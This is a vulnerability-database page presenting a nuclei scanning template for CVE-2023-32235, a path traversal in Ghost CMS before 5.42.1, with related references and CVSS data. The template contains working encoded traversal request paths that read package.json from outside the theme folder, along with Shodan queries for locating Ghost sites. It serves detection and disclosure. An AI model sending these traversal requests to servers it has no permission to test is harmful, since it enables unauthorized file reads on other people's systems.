Lucene search
K

Ghost CMS < 5.42.1 - Path Traversal

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 101 Views

Ghost CMS < 5.42.1 - Path Traversal, allows remote file rea

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Ghost
9 Jul 202320:01
githubexploit
Circl
CVE-2023-32235
5 May 202312:24
circl
CNNVD
Ghost 路径遍历漏洞
5 May 202300:00
cnnvd
CNVD
Ghost Directory Traversal Vulnerability
11 May 202300:00
cnvd
CVE
CVE-2023-32235
5 May 202300:00
cve
Cvelist
CVE-2023-32235
5 May 202300:00
cvelist
Exploit DB
Ghost CMS 5.42.1 - Path Traversal
11 Aug 202500:00
exploitdb
Tenable Nessus
Ghost CMS 5.42.1 - Path Traversal (CVE-2023-32235)
28 Oct 202500:00
nessus
Tenable Nessus
Ghost CMS < 5.42.1 Path Traversal
6 May 202400:00
nessus
Github Security Blog
Path Traversal in Ghost
5 May 202306:30
github
Rows per page
id: CVE-2023-32235

info:
  name: Ghost CMS < 5.42.1 - Path Traversal
  author: j3ssie
  severity: high
  description: |
    Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: Fixed in version 5.42.1
  reference:
    - https://github.com/advisories/GHSA-wf7x-fh6w-34r6
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32235
    - https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f
    - https://github.com/TryGhost/Ghost/compare/v5.42.0...v5.42.1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32235
    cwe-id: CWE-22
    epss-score: 0.39078
    epss-percentile: 0.98414
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query:
      - http.component:"Ghost"
      - http.component:"ghost"
  tags: cve2023,cve,lfi,ghostcms,ghost,node.js,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/built%2F..%2F..%2F/package.json"
      - "{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name"'
          - '"version"'
          - '"ghost"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100deaf78c1011db5bd1d12de8ef12f1fc22b0b9a3a1cc2c6ef3113214650b01b8302207f3a35d4dfb7fd660958265e9fbd83c1061526111c463d4123c0a7f4c325d025:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.39078
SSVC
101